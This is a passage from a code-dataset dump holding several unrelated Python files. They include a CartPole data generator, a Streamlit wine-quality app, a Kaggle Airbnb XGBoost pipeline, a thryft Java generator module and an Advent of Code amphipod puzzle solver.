np\nimport sys\nimport time\n\n\ndef create_training_data(\n episodes, \n max_steps,\n min_reward_for_training_data,\n watch_game=True\n ):\n \"\"\" \n creates training data for tf.estimator\n \"\"\"\n env = gym.make(\"CartPole-v1\")\n\n data = []\n labels = []\n tot_rewards = []\n\n for i_episode in range(episodes):\n print(f\"playing episode {i_episode}\")\n observation = env.reset()\n rewards = 0\n observations = []\n actions = []\n\n for t in range(max_steps):\n # plays game at human speeds\n # do not use when generating training data\n if watch_game:\n time.sleep(0.03)\n env.render()\n print(observation)\n\n action = env.action_space.sample()\n observation, reward, done, info = env.step(action)\n\n observations.append(observation)\n actions.append(action)\n rewards += reward\n\n # game should stop before rewards-check\n # don't want to train on data that causes game to end\n if rewards >= min_reward_for_training_data:\n for obs in observations:\n data.append(observation)\n for a in actions:\n labels.append(a)\n\n if done:\n break\n\n data = np.array(data)\n labels = np.array(labels)\n\n return data, labels\n\n\nif __name__ == \"__main__\":\n \n # settings\n name = sys.argv[0]\n episodes = 10\n max_steps = 1000\n min_reward_for_training_data = 0\n\n if len(sys.argv) > 1:\n episodes = int(sys.argv[1])\n max_steps = int(sys.argv[2])\n\n data, labels = create_training_data(\n episodes, \n max_steps, \n 
min_reward_for_training_data, \n watch_game=False\n )\n\n data_filename = \"data.npy\"\n labels_filename = \"labels.npy\"\n\n training_data_dir = \"training_data\"\n\n if not os.path.exists(training_data_dir):\n os.mkdir(training_data_dir)\n\n data_path = os.path.join(training_data_dir, data_filename)\n labels_path = os.path.join(training_data_dir, labels_filename)\n\n np.save(data_path, data)\n np.save(labels_path, labels)","sub_path":"cart_pole/create_training_data.py","file_name":"create_training_data.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"209757423","text":"import json\nimport numpy as np\n\nfrom torchmoji.sentence_tokenizer import SentenceTokenizer\nfrom torchmoji.model_def import torchmoji_feature_encoding\n\n\nVOCAB_PATH = 'model/vocabulary.json'\nPRETRAINED_PATH = 'model/pytorch_model.bin'\n\nTEST_SENTENCES = ['I love mom\\'s cooking',\n 'I love how you never reply back..',\n 'I love cruising with my homies',\n 'I love messing with yo mind!!',\n 'I love you and now you\\'re just gone..',\n 'This is shit',\n 'This is the shit']\n\n\nmaxlen = 30\nbatch_size = 32\n\nwith open(VOCAB_PATH, 'r') as f:\n vocabulary = json.load(f)\n\nst = SentenceTokenizer(vocabulary, maxlen)\n\nprint('Loading model from {}.'.format(PRETRAINED_PATH))\nmodel = torchmoji_feature_encoding(PRETRAINED_PATH)\nprint(model)\ntokenized, _, _ = st.tokenize_sentences(TEST_SENTENCES)\nencoding = model(tokenized)\n\navg_across_sentences = np.around(np.mean(encoding, axis=0)[:5], 3)\n\nprint('printing results')\nprint(avg_across_sentences)\n\nassert np.allclose(avg_across_sentences, np.array([-0.023, 0.021, -0.037, -0.001, -0.005]))","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"608804854","text":"import streamlit as st\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pickle\r\n\r\nst.title(\"Red wine prediction system\")\r\n\r\ncol1, col2, col3 = st.beta_columns(3)\r\n\r\nfixed_acidity = np.float(col1.text_input(\"Fixed Acidity\",7.4))\r\nvolatile_acidity = np.float(col2.text_input(\"Volatile Acidity\",0.7))\r\ncitric_acidity = np.float(col3.text_input(\"Citric Acid\",0))\r\nresidual_sugar = np.float(col1.text_input(\"Residual Sugar\",1.9))\r\nchlorides = np.float(col2.text_input(\"Chlorides\",0.076))\r\nfree_sulphur_dioxide =np.float(col3.text_input(\"Free Sulphur dioxide\",11))\r\ntotal_sulphur_dioxide = np.float(col1.text_input(\"Total Sulphur dioxide\",34))\r\ndensity = np.float(col2.text_input(\"Density\",0.9978))\r\nph = np.float(col3.text_input(\"PH\",3.51))\r\nsulphates = np.float(col1.text_input(\"Sulphate\",0.56))\r\nalcohol = np.float(col2.text_input(\"Alcohol\",0.7))\r\n\r\nfeatures_num = ['fixed acidity','volatile acidity','citric acid',\r\n 'residual sugar','chlorides','free sulfur dioxide',\r\n 'total sulfur dioxide','density','pH','sulphate','alcohol']\r\n\r\n\r\n\r\nsample = [fixed_acidity,\r\n volatile_acidity,\r\n citric_acidity,\r\n residual_sugar,\r\n chlorides,\r\n free_sulphur_dioxide,\r\n total_sulphur_dioxide,\r\n density,\r\n ph,\r\n sulphates,\r\n alcohol\r\n ]\r\n\r\nsample_df = pd.DataFrame([sample],columns = features_num)\r\nmodel = pickle.load(open('model.pkl',\"rb\"))\r\n\r\n\r\nif st.button('Predict'):\r\n result = model.predict(sample_df)\r\n if result == 3:\r\n st.header(\"Lowest Quality\")\r\n elif result == 4:\r\n 
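# --- Illustrative aside (not part of the original record) ---
# In create_training_data above, the reward-threshold branch appends the
# loop's latest `observation` once per stored step instead of each `obs`, so
# every feature row collected for an episode is identical. A minimal
# corrected sketch of that collection step, using the same lists:
def collect(observations, actions, data, labels):
    for obs, act in zip(observations, actions):
        data.append(obs)     # the observation recorded at this step
        labels.append(act)   # the action actually taken then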
st.header(\"Low Quality\")\r\n elif result == 5:\r\n st.header(\"Medium Quality\")\r\n elif result == 6:\r\n st.header(\"Average Quality\")\r\n elif result == 7:\r\n st.header(\"Good Quality\")\r\n else:\r\n st.header(\"Best Quality\")","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"534151549","text":"from typing import List\n\n\nclass Solution:\n def exist(self, board: List[List[str]], word: str) -> bool:\n m = len(board); n = len(board[0])\n \n def helper(row, col, idx, path):\n if row < 0 or m <= row:\n return False\n elif col < 0 or n <= col:\n return False\n \n if board[row][col] != word[idx]:\n return False\n \n if idx == len(word) - 1:\n return True\n \n for dr, dc in ((-1, 0), (1, 0), (0, -1), (0, 1)):\n if not (0 <= row + dr < m and 0 <= col + dc < n):\n continue\n elif (row + dr, col + dc) in path:\n continue\n \n if helper(row + dr, col + dc, idx + 1, path + [(row, col)]):\n return True\n \n return False\n \n for i in range(m):\n for j in range(n):\n if helper(i, j, 0, []):\n return True\n \n return False\n\n def exist2(self, board: List[List[str]], word: str) -> bool:\n def helper(i, j, word):\n if len(word) == 0:\n return True\n elif i < 0 or len(board) <= i or j < 0 or len(board[0]) <= j:\n return False\n elif word[0] != board[i][j]:\n return False\n\n tmp = board[i][j]\n board[i][j] = '#'\n res = helper(i + 1, j, word[1:]) or helper(i - 1, j, word[1:]) \\\n or helper(i, j + 1, word[1:]) or helper(i, j - 1, word[1:])\n board[i][j] = tmp\n return res\n\n for i in range(len(board)):\n for j in range(len(board[0])):\n if helper(i, j, word):\n return True\n\n return False\n \n\nif __name__ == '__main__':\n s = Solution()\n board = [[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"C\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]]\n word = \"ABCCED\"\n print(s.exist(board, word))\n print(s.exist2(board, word))\n","sub_path":"leetcode/medium/word-search.py","file_name":"word-search.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"12585139","text":"import typing\nimport os\nimport sys\nimport argparse\nimport util\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=f\"copies all files to the system according to {util.LOCATIONS_PATH}\",\n epilog=f'''\nexamples:\n{sys.argv[0]} --only vimrc plugin.conf\n{sys.argv[0]} --all\n ''',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n util.argparse_add_process_all_or_only_options(parser)\n args = parser.parse_args()\n if len(sys.argv) == 1:\n parser.print_help(sys.stderr)\n sys.exit(1)\n\n filtered = None\n if args.all:\n filtered = []\n if not args.all and args.only:\n filtered = args.only\n\n to_path = util.get_locations_dictionary(util.LOCATIONS_PATH)\n for conf in to_path.keys():\n if filtered and conf not in filtered: continue\n os.system(f'cp -v {conf} {to_path[conf]}')\n\n","sub_path":"push.py","file_name":"push.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"434384789","text":"\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\nimport xgboost as xgb\nimport csv\n\n\n#class for final pipeline\nclass Pipeline:\n \n def __init__(self, dataset, preprocessor, model):\n \n self.dataset = dataset \n self.preprocessor = preprocessor\n self.model = model\n \n #calls the preprocessor function on the dataset\n #outputs explained:\n #X: training features\n #y: ground truth\n #X_test: test features\n #test_id: the ids corresponding to X_test. Needed for creating final csv files\n #test_id_ndf: the ids for ndf found using date_first_booking = NULL\n def process(self):\n \n self.X , self.y, self.X_test, self.test_id, self.test_id_ndf = preprocessor(self.dataset)\n \n #train the model on processed data \n def train(self):\n \n self.model.fit(self.X, self.y)\n \n #create the predictions on the test data \n def predict(self):\n \n targets = ['AU', 'CA', 'DE', 'ES', 'FR', 'GB', 'IT', 'NL', 'PT', 'US','other']\n\n y_probs = self.model.predict_proba(self.X_test)\n y_pred = []\n for i in y_probs:\n max = [0,0,0]\n\n for j in range(len(i)):\n if(i[j] > i[max[0]]):\n max[2] = max[1]\n max[1] = max[0]\n max[0] = j\n elif(i[j] > i[max[1]]):\n max[2] = max[1]\n max[1] = j\n elif(i[j] > i[max[2]]):\n max[2] = j\n\n y_pred.append([targets[max[0]], targets[max[1]], targets[max[2]] ])\n \n self.predictions = y_pred\n \n #create the final csv for submission \n def create_csv(self, filename):\n \n fields = ['id','country_destination']\n final = []\n final.append(fields)\n for i in range(len(self.test_id)):\n for j in range(3):\n final.append([self.test_id[i],self.predictions[i][j]])\n\n for i in self.test_id_ndf:\n final.append([i,\"NDF\"])\n\n with open(filename + \".csv\", 'w') as f:\n w = csv.writer(f)\n w.writerows(final)\n\n#class for dataset \nclass Dataset:\n\n def __init__(self, datadir):\n # datadir = \"/kaggle/input/airbnb-new-user/\"\n self.train = pd.read_csv(datadir + \"train.csv\")\n self.test = pd.read_csv(datadir + \"test.csv\")\n self.session = pd.read_csv(datadir + \"sessions.csv\")\n\n\n#helper function for pre processing.\ndef process_field(x,field_list):\n if x in field_list:\n return x\n return -1\n\n#helper function for pre processing\ndef create_rename_dict(x, field_name):\n \n rename_dict = {}\n for i in x:\n string = str(i)\n string = field_name + \"_\" + string \n rename_dict[i] = string\n rename_dict[-1] = field_name + \"_misc\" \n return rename_dict\n\n\n#function to undertake all preprocessing required\ndef preprocessor(dataset):\n\n train = dataset.train\n test = dataset.test\n \n #seperate ndf from remaining\n test_id_ndf = test[test['date_first_booking'].isnull()].id.to_list()\n\n train = train[train['date_first_booking'].notnull()]\n test = test[test['date_first_booking'].notnull()] \n \n \n #list to specify which features to train on. 
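# --- Illustrative aside (not part of the original record) ---
# Pipeline.predict above tracks the three largest class probabilities with
# hand-rolled comparisons; numpy's argsort expresses the same top-3 pick. A
# minimal sketch, assuming each probability row aligns with `targets`:
import numpy as np

def top3_labels(row, targets):
    best = np.argsort(row)[::-1][:3]   # indices of the 3 highest probs
    return [targets[i] for i in best]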
We can add and remove based on what we want\n features = [ 'language', \"signup_flow\", \"affiliate_provider\"]\n\n #some binning to reduce unecessary unique values\n train.loc[train.gender == \"-unknown-\", 'gender'] = \"unknown\"\n test.loc[test.gender == \"-unknown-\", 'gender'] = \"unknown\"\n train.loc[train.first_device_type == \"Android Tablet\", \"first_device_type\"] = \"Android Phone\"\n test.loc[test.first_device_type == \"Android Tablet\", \"first_device_type\"] = \"Android Phone\"\n train.loc[train.first_device_type == \"iPad\", \"first_device_type\"] = \"iPhone\"\n test.loc[test.first_device_type == \"iPad\", \"first_device_type\"] = \"iPhone\"\n train.loc[train.first_browser == \"Chrome Mobile\", \"first_browser\"] = \"Chrome\"\n test.loc[test.first_browser == \"Chrome Mobile\", \"first_browser\"] = \"Chrome\"\n\n #specify which unique values get their own one hot encoding. Values not in the list will all be binned into misclaneous\n field_dict = {}\n field_dict[\"gender\"] = [ \"MALE\", \"FEMALE\"]\n field_dict[\"signup_method\"] = [\"basic\", 'facebook']\n field_dict[\"signup_flow\"] = [0, 25, 24, 23, 12, 8]\n field_dict[\"language\"] = ['en', 'fr', 'it' ]\n field_dict[\"affiliate_channel\"] = list(train[\"affiliate_channel\"].unique())\n field_dict[\"affiliate_provider\"] = ['direct', 'google', 'facebook', 'other', 'padmapper']\n field_dict[\"first_affiliate_tracked\"] = ['untracked', 'omg', 'linked', 'tracked-other', 'product']\n field_dict[\"signup_app\"] = ['Web', \"iOS\", 'Android', \"Moweb\"]\n field_dict[\"first_device_type\"] = [\"Mac Desktop\", \"Windows Desktop\", \"iPhone\", \"Android Phone\" ]\n field_dict[\"first_browser\"] = [\"Chrome\", \"Safari\", \"Firefox\", \"Mobile Safari\", \"IE\"] \n \n #Processes each field according to the field dicts specified above. 
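# --- Illustrative aside (not part of the original record) ---
# process_field above keeps whitelisted category values and collapses the
# rest to -1, which create_rename_dict later labels "<field>_misc". A
# minimal usage sketch, assuming the record's process_field is in scope:
providers = ['direct', 'google', 'facebook', 'other', 'padmapper']
assert process_field('google', providers) == 'google'
assert process_field('yahoo', providers) == -1   # binned as misc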
Here the misclaneous values are binned\n for i in features:\n train.loc[:,i] = train[i].apply(lambda x: process_field(x, field_dict[i]))\n test.loc[:,i] = test[i].apply(lambda x: process_field(x, field_dict[i]))\n \n #create new dataframe for final processed features\n X = pd.DataFrame()\n X_test = pd.DataFrame()\n test_id = test['id'].to_list()\n \n \n #perform one hot encoding\n for i in features:\n onehot = pd.get_dummies(train[i])\n onehot = onehot.rename(columns = create_rename_dict(field_dict[i], i))\n X = pd.concat([X, onehot], axis=1, sort=False)\n \n onehot = pd.get_dummies(test[i])\n onehot = onehot.rename(columns = create_rename_dict(field_dict[i], i))\n X_test = pd.concat([X_test, onehot], axis=1, sort=False) \n \n #ground truth\n y = pd.DataFrame()\n y[\"country_destination\"] = train[\"country_destination\"]\n \n return X , y, X_test, test_id, test_id_ndf \n\nmodel = xgb.XGBClassifier( n_estimators = 800, eta = 0.001, reg_lambda = 800, tree_method = \"gpu_hist\")\n\ndataset = Dataset(\"/kaggle/input/airbnb-new-user/\")\n\npipeline = Pipeline(dataset, preprocessor, model)\n\npipeline.process()\npipeline.train()\npipeline.predict()\npipeline.create_csv(\"final_submission\")\n","sub_path":"Final Code/pipeline-best-private-leaderboard.py","file_name":"pipeline-best-private-leaderboard.py","file_ext":"py","file_size_in_byte":6443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"600751729","text":"import sys\nfrom csv import reader\nfrom pyspark import SparkContext\n\nif __name__ == \"__main__\":\n sc = SparkContext()\n lines = sc.textFile(sys.argv[1], 1)\n lines = lines.mapPartitions(lambda x: reader(x))\n lines = lines.map(lambda x: ((x[14], x[16]), -1)).reduceByKey(lambda x, y: x+y)\n line = lines.sortBy(lambda x: (x[1],x[0])).take(20)\n res = sc.parallelize(line).map(lambda x: (x[0][0], x[0][1], -x[1]))\n res.map(lambda x: \"{0}, {1}\\t{2}\".format(x[0], x[1], x[2])).saveAsTextFile(\"task6.out\")\n sc.stop()\n\n","sub_path":"Spark/task6.py","file_name":"task6.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"524576199","text":"from app.logic.AuditLog import AuditLog\nfrom app.logic.Dice import Dice\nfrom app.logic.Player import Player\nfrom app.logic.Store import Store\nfrom app.logic.StoreManager import StoreManager\n\n\nclass Game:\n def __init__(self):\n self.store = Store()\n self.players = {}\n self.audit_log = AuditLog()\n self.store_manager = StoreManager(self.store)\n self.dice = Dice(self.audit_log, self.store_manager)\n\n def reset_game(self):\n self.store = Store()\n self.players = {}\n self.audit_log = AuditLog()\n self.store_manager = StoreManager(self.store)\n self.dice = Dice(self.audit_log, self.store_manager)\n\n def add_player(self, player_name):\n if player_name.lower() not in self.players:\n self.players[player_name.lower()] = Player(player_name, self.audit_log)\n\n def get_player(self, player_name):\n return self.players[player_name.lower()]\n","sub_path":"app/logic/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"206016046","text":"# -----------------------------------------------------------------------------\n# Copyright (c) 2019, Minor Gordon\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided 
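# --- Illustrative aside (not part of the original record) ---
# The preprocessor above one-hot encodes train and test separately, so a
# whitelisted category absent from one split leaves the two frames with
# different columns even after misc binning. A minimal alignment sketch:
import pandas as pd

def align_dummies(X, X_test):
    # give X_test exactly X's columns, zero-filling any it lacks
    return X, X_test.reindex(columns=X.columns, fill_value=0)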
that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in\n# the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND\n# CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,\n# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT\n# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY\n# OF SUCH DAMAGE.\n# -----------------------------------------------------------------------------\n\nfrom thryft.generator.function import Function\nfrom thryft.generators.java._java_named_construct import _JavaNamedConstruct\nfrom thryft.generators.java.java_struct_type import JavaStructType\nfrom thryft.util import lower_camelize, lpad, indent, upper_camelize\n\n\nclass JavaFunction(Function, _JavaNamedConstruct):\n class _JavaMessageType(JavaStructType):\n pass\n\n class _JavaRequestType(_JavaMessageType, Function._RequestType):\n def __init__(self, parent_function, parameters=None, **kwds):\n JavaFunction._JavaMessageType.__init__(\n self,\n java_class_modifiers='public final static',\n name=upper_camelize(parent_function.name) + 'Request',\n parent=parent_function.parent,\n **kwds\n )\n Function._RequestType.__init__(self, parent_function=parent_function, parameters=parameters)\n\n class _JavaResponseType(_JavaMessageType, Function._ResponseType):\n def __init__(self, parent_function, **kwds):\n JavaFunction._JavaMessageType.__init__(\n self,\n java_class_modifiers='public final static',\n name=upper_camelize(parent_function.name) + 'Response',\n parent=parent_function.parent,\n **kwds\n )\n Function._ResponseType.__init__(self, parent_function=parent_function)\n\n def java_annotations(self):\n annotations = []\n for requires_x in ('authentication', 'guest', 'user'):\n for annotation in self.annotations:\n if annotation.name == 'requires_' + requires_x:\n annotations.append('@org.apache.shiro.authz.annotation.Requires' + requires_x.capitalize())\n break\n for requires_x in ('permissions', 'roles'):\n for annotation in self.annotations:\n if annotation.name == 'requires_' + requires_x:\n annotations.append(\"@org.apache.shiro.authz.annotation.Requires%s({ %s })\" % (\n requires_x.capitalize(),\n ', '.join('\"%s\"' % x for x in annotation.value)\n ))\n break\n return annotations\n\n def java_declarations(self):\n javadoc = self.java_doc()\n name = self.java_name()\n if self.return_field is not None:\n return_type_name = self.return_field.type.java_qname()\n else:\n return_type_name = 'void'\n throws = \\\n lpad(\n ' throws ',\n ', '.join(field.type.java_qname()\n for field in self.throws)\n )\n\n declarations = []\n for parameters in self._java_overload_parameter_lists():\n if len(parameters) < len(self.parameters) and 
self._parent_generator().default_methods:\n declarations.append(self.__java_delegation_definition(parameters, default=True))\n else:\n parameters = \\\n ', '.join(parameter.java_parameter(final=True) for parameter in parameters)\n declarations.append(\"\"\"\\\n%(javadoc)spublic %(return_type_name)s %(name)s(%(parameters)s)%(throws)s;\"\"\" % locals())\n return declarations\n\n def __java_delegation_definition(self, parameters, default=False):\n if default:\n default = 'default '\n name = self.java_name()\n if self.return_field is not None:\n return_prefix = 'return '\n return_type_name = self.return_field.type.java_qname()\n else:\n return_prefix = ''\n return_type_name = 'void'\n throws = \\\n lpad(\n ' throws ',\n ', '.join(field.type.java_qname()\n for field in self.throws)\n )\n\n parameters = [parameter.java_parameter(final=True) for parameter in parameters]\n delegate_values = []\n for parameter_i, parameter in enumerate(self.parameters):\n if parameter.required:\n delegate_values.append(parameter.java_name())\n elif parameter_i < len(parameters):\n delegate_values.append(parameter.java_name())\n else:\n delegate_values.append(parameter.java_absent_value())\n delegate_values = ', '.join(delegate_values)\n parameters = ', '.join(parameters)\n return \"\"\"\\\npublic %(default)s%(return_type_name)s %(name)s(%(parameters)s)%(throws)s {\n %(return_prefix)s%(name)s(%(delegate_values)s);\n}\"\"\" % locals()\n\n def _java_delegating_definitions(self):\n definitions = []\n for parameters in self._java_overload_parameter_lists():\n if len(parameters) == len(self.parameters):\n continue\n definitions.append(self.__java_delegation_definition(parameters, default=False))\n return definitions\n\n def java_doc(self):\n javadoc_lines = []\n if self.doc is not None:\n javadoc_lines.extend(line.strip() for line in self.doc.splitlines())\n javadoc_lines.append('')\n\n name = self.java_name()\n\n for parameter in self.parameters:\n if parameter.doc is not None:\n javadoc_lines.append(\"@param %s %s\" % (parameter.java_name(), parameter.doc))\n\n if self.return_field is not None and self.return_field.doc is not None:\n javadoc_lines.append('@return ' + self.return_field.doc)\n\n for field in self.throws:\n if field.doc is not None:\n javadoc_lines.append(\"@throws %s %s\" % (field.type.java_qname(), field.doc))\n\n if len(javadoc_lines) > 0:\n javadoc_lines = \"\\n\".join(' * ' + javadoc_line for javadoc_line in javadoc_lines)\n return \"\"\"\\\n/**\n%(javadoc_lines)s\n */\n\"\"\" % locals()\n else:\n return ''\n\n def java_message_types(self, **kwds):\n message_types = [self.java_request_type(**kwds)]\n if not self.oneway:\n message_types.append(self.java_response_type(**kwds))\n return message_types\n\n def java_name(self):\n return lower_camelize(self.name)\n\n def _java_overload_parameter_lists(self):\n if not self._parent_generator().function_overloads:\n return (self.parameters,)\n\n first_optional_parameter_i = -1\n for parameter_i, parameter in enumerate(self.parameters):\n if not parameter.required:\n first_optional_parameter_i = parameter_i\n break\n if first_optional_parameter_i == -1:\n return (self.parameters,)\n\n overload_parameter_lists = []\n for optional_parameter_i in range(first_optional_parameter_i, len(self.parameters)+1):\n overload_parameter_lists.append(tuple(self.parameters[:optional_parameter_i]))\n return overload_parameter_lists\n\n def java_qname(self, **_kwds):\n return self.parent.java_qname() + '.' 
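# --- Illustrative aside (not part of the original record) ---
# _java_overload_parameter_lists above expands one signature into every
# prefix from the first optional parameter onward. A minimal standalone
# sketch of that rule, assuming params is a list of (name, required) pairs:
def overload_prefixes(params):
    first_opt = next(
        (i for i, (_, required) in enumerate(params) if not required),
        len(params))
    if first_opt == len(params):
        return [params]          # no optional params: single signature
    return [params[:i] for i in range(first_opt, len(params) + 1)]
# e.g. overload_prefixes([('a', True), ('b', False)]) yields the ('a')-only
# and ('a', 'b') signatures, mirroring the generated Java overloads.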
+ self.java_name()\n\n def java_request_type(self, **kwds):\n return self._JavaRequestType(parent_function=self, **kwds)\n\n def java_response_type(self, **kwds):\n return self._JavaResponseType(parent_function=self, **kwds)\n","sub_path":"compiler/src/thryft/generators/java/java_function.py","file_name":"java_function.py","file_ext":"py","file_size_in_byte":8740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"266884534","text":"from frozendict import frozendict\n\n# Puzzle Input ----------\nwith open('Day23-Input.txt') as file:\n puzzle = file.read().split('\\n')\n\nwith open('Day23-Test01.txt') as file:\n test01 = file.read().split('\\n')\n\n\n# Main Code ----------\n\n# See what amphipods are in each room\ndef process_burrow(burrow: list):\n rooms = [[] for _ in range(4)]\n for room_num, room_pos in enumerate(range(3, 10, 2)):\n for amphipod in range(2):\n rooms[room_num] += [burrow[amphipod + 2][room_pos]]\n\n # Coordinate system for the burrow\n coords = {f'H{str(hex(x))[-1]}': '.' for x in range(11)}\n hallway_coords = list(coords.keys())\n room_coords = []\n for room_letter, room in [('A', rooms[0]), ('B', rooms[1]), ('C', rooms[2]), ('D', rooms[3])]:\n for room_space, amphipod in enumerate(room):\n coords[f'{room_letter}{room_space}'] = amphipod\n room_coords += [f'{room_letter}{room_space}']\n return coords, hallway_coords, room_coords\n\n\n# Get the energy per step associated with each amphipod\ndef energy_per_step(amphipod: str):\n energy_dict = {'A': 1, 'B': 10, 'C': 100, 'D': 1000}\n return energy_dict[amphipod]\n\n\n# See if the amphipod can and should leave the room\ndef can_leave_room(coords, start):\n # Ignore empty spaces\n if coords[start] == '.':\n return False\n\n room, y = start\n amphipod = coords[start]\n\n max_y = 1\n y = int(y)\n if amphipod != room:\n # It's on the room piece connecting to the hallway\n if y == 0:\n return True\n\n # See if the other room slots are blocked\n for room_y in range(y - 1, -1, -1):\n if coords[f'{room}{room_y}'] != '.':\n return False\n return True\n\n # If the amphipod is in the right room, see if there are only other amphipods of the same type in there\n else:\n for room_y in range(y, max_y + 1):\n if coords[f'{room}{room_y}'] != amphipod:\n return True\n return False\n\n\n# See if a room only has the right type of amphipods\ndef room_right_amphipods(coords, amphipod):\n max_y = 1\n\n for room_y in range(max_y + 1):\n if not coords[amphipod + str(room_y)] in [amphipod, '.']:\n return False\n return True\n\n\n# Get the possible moves the amphipods can make\ndef possible_moves(coords, hallway_coords: list, room_coords: list):\n moves = []\n\n # Coordinates of the rooms\n room_by_amphipod = {\n 'A': 2,\n 'B': 4,\n 'C': 6,\n 'D': 8\n }\n\n for start in room_coords:\n if not can_leave_room(coords, start):\n continue\n\n amphipod = coords[start]\n\n # Check if the amphipod can go from one room to the right room\n if room_right_amphipods(coords, amphipod):\n\n # Check the hallway path to there is clear\n start_hall = room_by_amphipod[start[0]]\n end_hall = room_by_amphipod[amphipod]\n if end_hall > start_hall:\n path = [f'H{str(hex(x))[-1]}' for x in range(start_hall + 1, end_hall)]\n else:\n path = [f'H{str(hex(x))[-1]}' for x in range(end_hall + 1, start_hall)]\n path_blocked = False\n for item in path:\n if coords[item] != '.':\n path_blocked = True\n break\n if path_blocked:\n continue\n\n # Calculate energy and save this as a possible move\n end = amphipod + '1' if 
coords[amphipod + '1'] == '.' else amphipod + '0'\n steps = int(start[1]) + 1 + abs(start_hall - end_hall) + int(end[1]) + 1\n\n moves += [(start, end, steps * energy_per_step(amphipod))]\n\n for end in hallway_coords:\n if coords[end] != '.':\n continue\n\n # Check the hallway path there is clear\n start_hall = room_by_amphipod[start[0]]\n end_hall = int(end[1], 16)\n if end_hall > start_hall:\n path = [f'H{str(hex(x))[-1]}' for x in range(start_hall, end_hall + 1)]\n else:\n path = [f'H{str(hex(x))[-1]}' for x in range(end_hall, start_hall + 1)]\n path_blocked = False\n for item in path:\n if coords[item] != '.':\n path_blocked = True\n break\n if path_blocked:\n continue\n\n # Calculate energy and save this as a possible move\n steps = abs(start_hall - end_hall) + int(start[1]) + 1\n\n moves += [(start, end, steps * energy_per_step(amphipod))]\n\n # The amphipod starts in an hallway\n for start in hallway_coords:\n\n # Ignore empty spaces\n if coords[start] == '.':\n continue\n\n amphipod = coords[start]\n\n # Check if the room only has amphipods of the right type\n if room_right_amphipods(coords, amphipod):\n\n # Check that the hallway path to there is clear\n start_hall = int(start[1], 16)\n end_hall = room_by_amphipod[amphipod]\n if end_hall > start_hall:\n path = [f'H{str(hex(x))[-1]}' for x in range(start_hall + 1, end_hall)]\n else:\n path = [f'H{str(hex(x))[-1]}' for x in range(end_hall + 1, start_hall)]\n path_blocked = False\n for item in path:\n if coords[item] != '.':\n path_blocked = True\n break\n if path_blocked:\n continue\n\n # Calculate energy and save this as a possible move\n end = amphipod + '1' if coords[amphipod + '1'] == '.' else amphipod + '0'\n steps = abs(start_hall - end_hall) + int(end[1]) + 1\n\n moves += [(start, end, steps * energy_per_step(amphipod))]\n return moves\n\n\n# See the theoretical minimum or maximum energy to get from the current state to the solution state\nlimit_energy_memory = dict()\n\n\ndef limit_energy(coords, minimum=True):\n if coords in limit_energy_memory:\n return limit_energy_memory[coords]\n max_y = 1\n\n # Coordinates of the rooms\n room_by_amphipod = {\n 'A': 2,\n 'B': 4,\n 'C': 6,\n 'D': 8\n }\n\n energy = 0\n for room in ['A', 'B', 'C', 'D']:\n for room_y in range(0, max_y + 1):\n amphipod = coords[room + str(room_y)]\n if amphipod == '.':\n continue\n\n start_hall = room_by_amphipod[room]\n end_hall = room_by_amphipod[amphipod]\n\n if minimum:\n steps = abs(end_hall - start_hall) + int(room_y) * 2 + 2\n else:\n steps = end_hall + start_hall + int(room_y) * 2 + 2\n energy += steps * energy_per_step(amphipod)\n\n for hallway_num in range(0, 11):\n hallway_str = str(hex(hallway_num))[-1]\n amphipod = coords['H' + hallway_str]\n if amphipod == '.':\n continue\n\n start_hall = hallway_num\n end_hall = room_by_amphipod[amphipod]\n\n if minimum:\n steps = abs(end_hall - start_hall) + 1\n else:\n steps = end_hall + start_hall + max_y + 1\n energy += 